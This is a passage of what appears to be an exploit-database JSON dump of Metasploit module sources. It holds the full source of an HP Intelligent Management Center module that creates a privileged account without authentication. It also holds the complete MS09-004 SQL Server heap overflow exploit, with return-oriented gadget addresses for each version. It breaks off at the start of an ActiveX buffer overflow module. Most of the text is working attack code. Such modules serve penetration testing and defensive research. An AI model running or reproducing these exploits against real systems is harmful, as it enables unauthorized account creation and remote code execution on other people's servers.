%q{\n This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the AccountService RpcServiceServlet from the SOM component,\n in order to create a SOM account with Account Management permissions. This module has\n been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with\n SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.\n },\n 'References' =>\n [\n [ 'CVE', '2013-4824' ],\n [ 'OSVDB', '98249' ],\n [ 'BID', '62902' ],\n [ 'ZDI', '13-240' ],\n [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943547' ]\n ],\n 'Author' =>\n [\n 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Oct 08 2013\"\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('USERNAME', [true, 'Username for the new account', 'msf']),\n OptString.new('PASSWORD', [true, 'Password for the new account', 'p4ssw0rd'])\n ])\n end\n\n def get_service_desk_strong_name\n res = send_request_cgi({\n 'uri' => normalize_uri(\"servicedesk\", \"servicedesk\", \"servicedesk.nocache.js\"),\n 'method' => 'GET'\n })\n\n if res and res.code == 200 and res.body =~ /unflattenKeylistIntoAnswers\\(\\['default', 'safari'\\], '([0-9A-Fa-f]+)'\\);/\n return $1\n end\n\n return nil\n end\n\n def get_account_service_strong_name(service_desk)\n res = send_request_cgi({\n 'uri' => normalize_uri(\"servicedesk\", \"servicedesk\", \"#{service_desk}.cache.html\"),\n 'method' => 'GET'\n })\n\n if res and res.code == 200 and res.body =~ /'accountSerivce.gwtsvc', '([0-9A-Fa-f]+)', SERIALIZER_1/\n return $1\n end\n\n return nil\n end\n\n def run\n\n print_status(\"Trying to find the service desk service strong name...\")\n service_desk = get_service_desk_strong_name\n if service_desk.nil?\n print_error(\"service desk service not found.\")\n return\n end\n print_good(\"service desk strong number found: #{service_desk}\")\n\n print_status(\"Trying to find the AccountService strong name...\")\n account_service = get_account_service_strong_name(service_desk)\n if account_service.nil?\n print_error(\"AccountService service not found.\")\n return\n end\n print_good(\"AccountService strong number found: #{account_service}\")\n\n header= \"6|0|39\" # version | unknown | string_table size\n\n # Used to parse the payload\n string_table = [\n \"http://localhost:8080/servicedesk/servicedesk/\", # 1 servlet URL\n \"#{account_service}\", # 2 AccountService strong name\n \"com.h3c.imc.eu.client.account.AccountService\", # 3 GWT Service Class\n \"addAccount\", # 4 GWT Service Method\n \"com.extjs.gxt.ui.client.data.BaseModelData/3541881726\", # 5 BaseModelData Type\n \"com.extjs.gxt.ui.client.data.RpcMap/3441186752\", # 6 RpcMap Type\n \"isAccount\", # 7 isAccount Field\n \"java.lang.Boolean/476441737\", # 8 Boolean Type\n \"ssName\", # 9 ssName Field\n \"java.lang.String/2004016611\", # 10 String Type\n datastore[\"USERNAME\"], # 11 ssName Value\n \"authType\", # 12 authType Field\n \"java.lang.Integer/3438268394\", # 13 Integer Type\n \"ssPassword\", # 14 ssPassword Field\n datastore[\"PASSWORD\"], # 15 ssPassword value\n \"accountGroups\", # 16 accountGroups Field\n \"java.util.ArrayList/3821976829\", # 17 ArayList Type\n \"permissions\", # 18 permissions Field\n \"iMC-SOM-SERVICEDESK\", # 19 permissions Value\n \"iMC-SOM-SERVICEDESK.PROCTASK\", # 20 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT\", # 21 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT.VIEW\", # 22 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT.ADD\", # 23 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT.MOD\", # 24 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT.DEL\", # 25 permissions Value\n \"userName\", # 26 userName Field\n \"certification\", # 27 certification Field\n \"userGroupId\", # 28 userGroupId Field\n \"java.lang.Long/4227064769\", # 29 Long Type\n \"userGroupName\", # 30 userGroupName Field\n \"Ungrouped\", # 31 userGroupName Value\n \"userGroupDescription\", # 32 userGroupDescription Field\n \"Ungrouped User.This record is generated by system, can not be deleted.\", # 33 userGroupDescription Value\n \"address\", # 34 address Field\n \"\", # 35 address Value\n \"phone\", # 36 phone Field\n \"email\", # 37 email Field\n \"userAppendInfo\", # 38 userAppendInfo Field\n \"java.util.HashMap/962170901\" # 39 HashMap Type\n ].join(\"|\")\n\n payload = [\n \"1\", # servlet URL\n \"2\", # strong name\n \"3\", # GWT Service Class\n \"4\", # GWT Service Method (addAccount)\n \"1\", # number of method parameters (addAccount has 1 parameter)\n \"5\", # parameter type (BaseModelData)\n \"5\", # read BaseModelData\n \"1\", # read 1 object into the BaseModelData\n \"6\", # read RpcMap\n \"15\", # read 15 objects into the RpcMap\n \"7\", # RpcMap[0] => isAccount\n \"8\", # isAccount Type (Boolean)\n \"1\", # isAccount Value (true)\n \"9\", # RpcMap[1] => ssName\n \"10\", # ssName Type (String)\n \"11\", # ssName Value\n \"12\", # RpcMap[2] => authType\n \"13\", # authType Type\n \"0\", # authType Value (0 => password)\n \"14\", # RpcMap[3] => ssPassword\n \"10\", # ssPassword Type (String)\n \"15\", # ssPassword Value\n \"16\", # RpcMap[4] => accountGroups\n \"17\", # accountGroups Type (ArrayList)\n \"0\", # accountGroups size (0)\n \"18\", # RpcMap[5] => permissions\n \"17\", # permissions Type (ArrayList)\n \"7\", # permissions size (7)\n \"10\", # permissions[0] Type (String)\n \"19\", # permissions[0] Value (iMC-SOM-SERVICEDESK)\n \"10\", # permissions[1] Type (String)\n \"20\", # permissions[1] Value (iMC-SOM-SERVICEDESK.PROCTASK)\n \"10\", # permissions[2] Type (String)\n \"21\", # permissions[2] Value (iMC-SOM-SERVICEDESK.ACCT)\n \"10\", # permissions[3] Type (String)\n \"22\", # permissions[3] Value (iMC-SOM-SERVICEDESK.ACCT.VIEW)\n \"10\", # permissions[4] Type (String)\n \"23\", # permissions[4] Value (iMC-SOM-SERVICEDESK.ACCT.ADD)\n \"10\", # permissions[5] Type (String)\n \"24\", # permissions[5] Value (iMC-SOM-SERVICEDESK.ACCT.MOD)\n \"10\", # permissions[6] Type (String)\n \"25\", # permissions[6] Value (iMC-SOM-SERVICEDESK.ACCT.DEL)\n \"26\", # RpcMap[6] => username\n \"-4\", # username Type - not provided\n \"27\", # RpcMap[7] => certification\n \"-4\", # certification Type - not provided\n \"28\", # RpcMap[8] => userGroupId\n \"29\", # userGroupId Type (Long)\n \"B\", # userGroupId Value - not provided\n \"30\", # RpcMap[9] => userGroupName\n \"10\", # userGroupName Type (String)\n \"31\", # userGroupName Value (Ungrouped)\n \"32\", # RpcMap[10] => userGroupDescription\n \"10\", # userGroupDescription Type (String)\n \"33\", # userGroupDescription Value (Ungrouped User.This record is generated by system, can not be deleted.)\n \"34\", # RpcMap[11] => address\n \"10\", # address Type (String)\n \"35\", # address Value (\"\")\n \"36\", # RpcMap[12] => phone\n \"-19\",# phone Type - not provided\n \"37\", # RpcMap[13] => email\n \"-19\",# email Type - not provided\n \"38\", # RpcMap[14] => userAppendInfo\n \"39\", # userAppendInfo Type (HashMap)\n \"0\" # userAppendInfo HashMap size (0)\n ].join(\"|\")\n\n gwt_request = [header, string_table, payload].join(\"|\")\n gwt_request << \"|\" # end\n\n service_url = ssl ? \"https://\" : \"http://\"\n service_url << \"#{rhost}:#{rport}/servicedesk/servicedesk/\"\n\n print_status(\"Trying to create account #{datastore[\"USERNAME\"]}...\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(\"servicedesk\", \"servicedesk\", \"accountSerivce.gwtsvc\"),\n 'ctype' => 'text/x-gwt-rpc; charset=UTF-8',\n 'headers' => {\n \"X-GWT-Module-Base\" => service_url,\n \"X-GWT-Permutation\" => \"#{service_desk}\"\n },\n 'data' => gwt_request\n })\n\n unless res and res.code == 200\n print_error(\"Unknown error while creating the user.\")\n return\n end\n\n if res.body =~ /Username.*already exists/\n print_error(\"The user #{datastore[\"USERNAME\"]} already exists.\")\n return\n elsif res.body =~ /Account.*added successfully/\n login_url = ssl ? \"https://\" : \"http://\"\n login_url << \"#{rhost}:#{rport}/servicedesk/ServiceDesk.jsp\"\n\n connection_details = {\n module_fullname: self.fullname,\n username: datastore['USERNAME'],\n private_data: datastore['PASSWORD'],\n private_type: :password,\n workspace_id: myworkspace_id,\n proof: \"#{login_url}\\n#{res.body}\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_details)\n create_credential_and_login(connection_details)\n\n print_good(\"Account #{datastore[\"USERNAME\"]}/#{datastore[\"PASSWORD\"]} created successfully.\")\n print_status(\"Use it to log into #{login_url}\")\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/hp/hp_imc_som_create_account.rb"}, {"lastseen": "2019-11-29T11:18:31", "bulletinFamily": "exploit", "description": "A heap-based buffer overflow can occur when calling the undocumented \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005 without any public mention. An authenticated database session is required to access the vulnerable code. That said, it is possible to access the vulnerable code via an SQL injection vulnerability. This exploit smashes several pointers, as shown below. 1\\. pointer to a 32-bit value that is set to 0 2\\. pointer to a 32-bit value that is set to a length influenced by the buffer length. 3\\. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the displacement is 0x10. The address of our buffer is conveniently stored in ecx when this instruction is executed. 4\\. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, return oriented programming is used to normalize the execution state and finally execute the payload via a \"jmp esp\". All addresses used were found within the sqlservr.exe memory space, yielding very reliable code execution using only a single query. NOTE: The MSSQL server service does not automatically restart by default. That said, some exceptions are caught and will not result in terminating the process. If the exploit crashes the service prior to hijacking the stack, it won't die. Otherwise, it's a goner.\n", "modified": "2017-09-14T02:03:34", "published": "2009-12-31T16:26:32", "id": "MSF:EXPLOIT/WINDOWS/MSSQL/MS09_004_SP_REPLWRITETOVARBIN", "href": "", "type": "metasploit", "title": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::MSSQL\n\n def initialize(info = {})\n\n super(update_info(info,\n 'Name' => 'MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption',\n 'Description' => %q{\n A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n An authenticated database session is required to access the vulnerable code.\n That said, it is possible to access the vulnerable code via an SQL injection\n vulnerability.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.\n },\n 'Author' => [ 'jduck' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '50589' ],\n [ 'CVE', '2008-5416' ],\n [ 'BID', '32710' ],\n [ 'MSB', 'MS09-004' ],\n [ 'EDB', '7501' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 512,\n 'BadChars' => \"\", # bad bytes get encoded!\n 'PrependEncoder' => \"\\x81\\xc4\\xf0\\xef\\xff\\xff\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Privileged' => true,\n 'Targets' =>\n [\n # auto targeting!\n [ 'Automatic', { } ],\n\n #\n # Individual targets\n #\n [\n # Microsoft SQL Server 2000 - 8.00.194 (Intel X86)\n # Aug 6 2000 00:57:48\n 'MSSQL 2000 / MSDE SP0 (8.00.194)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00a87f26, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x6900a7, # not directly used - call [ecx+0x08]\n 'Disp' => 0x08, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0041b78f, # xchg ecx,esp / sbb [eax],al / pop esi / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x0071f5fb, # advance esp to next ret (add esp,0x20 / ret)\n 'Ret' => 0x0041c9a2 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.384 (Intel X86)\n # May 23 2001 00:02:52\n 'MSSQL 2000 / MSDE SP1 (8.00.384)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00a95b2f, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x4b4f00, # not directly used - call [ecx-0x18]\n 'Disp' => 0x34, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0044d300, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret\n 'Popped' => 0x8, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x004a2ce9, # advance esp to next ret (add esp,0x1c / ret)\n 'Ret' => 0x004caa15 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.534 (Intel X86)\n # Nov 19 2001 13:23:50\n 'MSSQL 2000 / MSDE SP2 (8.00.534)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00a64f7e, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x660077, # not directly used - call [ecx-0x18]\n 'Disp' => 0x34, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0054131c, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret\n 'Popped' => 0x8, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x005306a0, # advance esp to next ret (add esp,0x1c / ret)\n 'Ret' => 0x004ca984 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.760 (Intel X86)\n # Dec 17 2002 14:22:05\n 'MSSQL 2000 / MSDE SP3 (8.00.760)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00ac344e, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x490074, # not directly used - call [ecx+0x14]\n 'Disp' => 0x34, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x00454303, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret\n 'Popped' => 0x8, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x00503413, # advance esp to next ret (add esp,0x20 / ret)\n 'Ret' => 0x0043fa97 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)\n # May 3 2005 23:18:38\n 'MSSQL 2000 / MSDE SP4 (8.00.2039)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x0046592e, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x69f5e8, # not directly used - call [ecx+0x14]\n 'Disp' => 0x14, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x007b39a8, # push ecx / pop esp / mov ax,[eax+0x18] / mov [ecx+0x62],ax / pop ebp / ret 0x4\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x00b3694d, # advance esp to next ret (add esp,0x20 / ret)\n 'Ret' => 0x0047c89d # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)\n # Oct 14 2005 00:33:37\n 'MSSQL 2005 SP0 (9.00.1399.06)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => 63, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash\n 'Writable' => 0x53ad5330, # any writable addr (not even necessary really)\n 'Vtable' => 0x02201ca8, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x10e860f, # not directly used - call [ecx+0x14]\n 'Disp' => 0x50, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0181c0d4, # push ecx / pop esp / pop ebp / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x0147deb7, # advance esp to next ret (add esp,0x10 / ret)\n 'Ret' => 0x0112c2c7 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86)\n # Apr 14 2006 01:12:25\n 'MSSQL 2005 SP1 (9.00.2047.00)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => 63, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash\n 'Writable' => 0x53ad5330, # any writable addr (not even necessary really)\n 'Vtable' => 0x0244c803, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x17139e9, # not directly used - call [ecx+0x14]\n 'Disp' => 0x52, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0183bf9c, # push ecx / pop esp / pop ebp / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x014923c1, # advance esp to next ret (add esp,0x10 / ret)\n 'Ret' => 0x011b204c # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)\n # Feb 9 2007 22:47:07\n 'MSSQL 2005 SP2 (9.00.3042.00)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => 63, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash\n 'Writable' => 0x53ad5330, # any writable addr (not even necessary really)\n 'Vtable' => 0x027fca52, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x1106d6b, # not directly used - call [ecx+0x14]\n 'Disp' => 0x52, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x01849641, # push ecx / pop esp / pop ebp / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x01498b22, # advance esp to next ret (add esp,0x10 / ret)\n 'Ret' => 0x010a5379 # jmp esp\n },\n ],\n\n [ 'CRASHER', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 09 2008'\n ))\n\n end\n\n def check\n # the ping to port 1434 method has two drawbacks...\n # #1, it doesn't work on mssql 2005 or newer (localhost only listening)\n # #2, it doesn't give an accurate version number (sp/os)\n\n # since we need to have credentials for this vuln, we just login and run a query\n # to get the version information\n if not (version = mssql_query_version())\n return Exploit::CheckCode::Safe\n end\n print_status(\"@@version returned:\\n\\t\" + version)\n\n # Any others?\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.194/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.384/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.534/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.760/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.2039/)\n return Exploit::CheckCode::Appears if (version =~ /9\\.00\\.1399\\.06/)\n return Exploit::CheckCode::Appears if (version =~ /9\\.00\\.2047\\.00/)\n return Exploit::CheckCode::Appears if (version =~ /9\\.00\\.3042\\.00/)\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n\n mytarget = nil\n if target.name =~ /Automatic/\n print_status(\"Attempting automatic target detection...\")\n\n version = mssql_query_version\n fail_with(Failure::NoAccess, \"Unable to retrieve version information\") if not version\n\n if (version =~ /8\\.00\\.194/)\n mytarget = targets[1]\n elsif (version =~ /8\\.00\\.384/)\n mytarget = targets[2]\n elsif (version =~ /8\\.00\\.534/)\n mytarget = targets[3]\n elsif (version =~ /8\\.00\\.760/)\n mytarget = targets[4]\n elsif (version =~ /8\\.00\\.2039/)\n mytarget = targets[5]\n elsif (version =~ /9\\.00\\.1399\\.06/)\n mytarget = targets[6]\n elsif (version =~ /9\\.00\\.2047\\.00/)\n mytarget = targets[7]\n elsif (version =~ /9\\.00\\.3042\\.00/)\n mytarget = targets[8]\n end\n\n if mytarget.nil?\n fail_with(Failure::NoTarget, \"Unable to determine target\")\n else\n print_status(\"Automatically detected target \\\"#{mytarget.name}\\\"\")\n end\n else\n mytarget = target\n end\n\n sqlquery = %Q|declare @i int,@z nvarchar(4000)\nset @z='declare @e int,@b varbinary,@l int;'\nset @z=@z+'exec sp_replwritetovarbin %NUM%,@e out,@b out,@l out,''%STUFF%'',@l,@l,@l,@l,@l,@l,@l,@l'\nexec sp_executesql @z|\n\n # just crash it with a pattern buffer if the CRASHER target is selected..\n if mytarget.name == 'CRASHER'\n sploit = Rex::Text.pattern_create(2048)\n print_status(\"Attempting to corrupt memory to cause an exception!\")\n num = 32\n else\n # trigger the memory corruption\n num = mytarget['Num']\n vt_off = mytarget['VtOff']\n vt_disp = mytarget['VtDisp']\n vtable = mytarget['Vtable']\n ecx_disp = mytarget['Disp']\n esp_off = mytarget['Offset']\n hijack_esp = mytarget['ecx2esp']\n first_esp = mytarget['Popped']\n fix_esp = mytarget['FixESP']\n writable = mytarget['Writable']\n corruptable_bytes = 0x44\n\n # make sploit buff\n sz = (num + vt_off) + esp_off + (2 + corruptable_bytes) + payload.encoded.length\n #sploit = Rex::Text.pattern_create(sz)\n sploit = rand_text_alphanumeric(sz)\n\n # remove displacement! (using call [ecx+displacement])\n vtable_off = (num + vt_off)\n sploit[vtable_off,4] = [(vtable - vt_disp)].pack('V')\n\n # stack -> heap\n hijack_off = vtable_off + ecx_disp\n sploit[hijack_off,4] = [hijack_esp].pack('V')\n # becomes eax on mssql 2ksp4 (prevent crash)\n sploit[(vtable_off-4),4] = [writable].pack('V')\n\n # becomes eip after esp hijack\n fixesp_off = vtable_off + first_esp\n sploit[fixesp_off,4] = [fix_esp].pack('V')\n\n # rest of magic stack (disable DEP?)\n stack_off = vtable_off + esp_off\n stack = []\n stack << mytarget['Ret']\n stack = stack.pack('V*')\n # jump over the stuff that gets corrupted\n stack << \"\\xeb\" + [corruptable_bytes].pack('C')\n stack << rand_text_alphanumeric(corruptable_bytes)\n stack << payload.encoded\n sploit[stack_off,stack.length] = stack\n\n # this has to be put in after the stack area since the ptr for sql2k sp1 is in the corrupted stuff\n sploit[hijack_off,4] = [hijack_esp].pack('V')\n\n print_status(\"Redirecting flow to %#x via call to our faked vtable ptr @ %#x\" % [mytarget['FixDisp'], vtable])\n end\n\n # encode chars that get modified\n enc = mssql_encode_string(sploit)\n\n # put the number in (start offset)\n runme = sqlquery.gsub(/%NUM%/, num.to_s)\n runme.gsub!(/%STUFF%/, enc)\n\n # go!\n if !mssql_login_datastore\n fail_with(Failure::NoAccess, \"Unable to log in!\")\n end\n begin\n mssql_query(runme, datastore['VERBOSE'])\n rescue ::Errno::ECONNRESET, EOFError\n print_error(\"Error: #{$!}\")\n end\n\n handler\n disconnect\n end\n\n\n def mssql_str_to_chars(str)\n ret = \"\"\n str.unpack('C*').each do |ch|\n ret += \"+\" if ret.length > 0\n ret += \"char(\"\n ret << ch.to_s\n ret += \")\"\n end\n return ret\n end\n\n\n def mssql_encode_string(str)\n badchars = \"\\x00\\x80\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8e\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9e\\x9f\"\n\n enc = \"\"\n in_str = true\n str.unpack('C*').each do |ch|\n # double-double single quotes\n if ch == 0x27\n if not in_str\n enc << \"+'\"\n in_str = true\n end\n enc << ch.chr * 4\n next\n end\n\n # double backslashes\n if ch == 0x5c\n if not in_str\n enc << \"+'\"\n in_str = true\n end\n enc << ch.chr * 2\n next\n end\n\n # convert any bad stuff to char(0xXX)\n if ((idx = badchars.index(ch.chr)))\n enc << \"'\" if in_str\n enc << \"+char(0x%x)\" % ch\n in_str = false\n else\n enc << \"+'\" if not in_str\n enc << ch.chr\n in_str = true\n end\n end\n enc << \"+'\" if not in_str\n return enc\n end\n\n\n def mssql_query_version\n begin\n logged_in = mssql_login_datastore\n rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR\n return nil\n end\n\n if !logged_in\n fail_with(Failure::NoAccess, \"Invalid SQL Server credentials\")\n end\n res = mssql_query(\"select @@version\", datastore['VERBOSE'])\n disconnect\n\n return nil if not res\n if res[:errors] and not res[:errors].empty?\n errstr = \"\"\n res[:errors].each do |err|\n errstr << err\n end\n fail_with(Failure::Unknown, errstr)\n end\n\n if not res[:rows] or res[:rows].empty?\n return nil\n end\n\n return res[:rows][0][0]\n end\nend\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb"}, {"lastseen": "2019-11-24T09:39:39", "bulletinFamily": "exploit", "description": "This module exploits a data segment buffer overflow within Winds3D Viewer of AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of AwingSoft Web3D Player. By setting an overly long value to the 'SceneURL' property, an attacker can overrun a buffer and execute arbitrary code.\n", "modified": "2017-07-24T13:26:21", "published": "2009-11-14T04:36:20", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/AWINGSOFT_WEB3D_BOF", "href": "", "type": "metasploit", "title": "AwingSoft Winds3D Player SceneURL Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# awingsoft_web3d_bof.rb\n#\n# AwingSoft Web3D Player 'SceneURL()' Buffer Overflow exploit for the Metasploit Framework\n#\n# Tested successfully on the following platforms:\n# - Internet Explorer 6, Windows XP SP2\n# - Internet Explorer 7, Windows XP SP3\n#\n# WindsPly.ocx versions tested:\n# - 3.0.0.5\n# - 3.5.0.0\n# - 3.6.0.0 (beta)\n#\n# Trancer\n# http://www.rec-sec.com\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AwingSoft Winds3D Player SceneURL Buffer Overflow',\n 'Description' => %q{\n This module exploits a data segment buffer overflow within Winds3D Viewer of\n AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of\n AwingSoft Web3D Player.\n By setting an overly long value to the 'SceneURL' property, an attacker can\n overrun a buffer and execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'shinnai <shinnai[at]autistici.org>',\t# Original exploit [see References]\n 'Trancer <mtrancer[at]gmail.com>',\t \t# Metasploit implementation\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '2009-4588' ],\n [ 'OSVDB', '60017' ],\n [ 'EDB', '9116' ],\n [ 'URL', 'http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process'\n },\n 'Payload' =>\n {\n 'Space' => 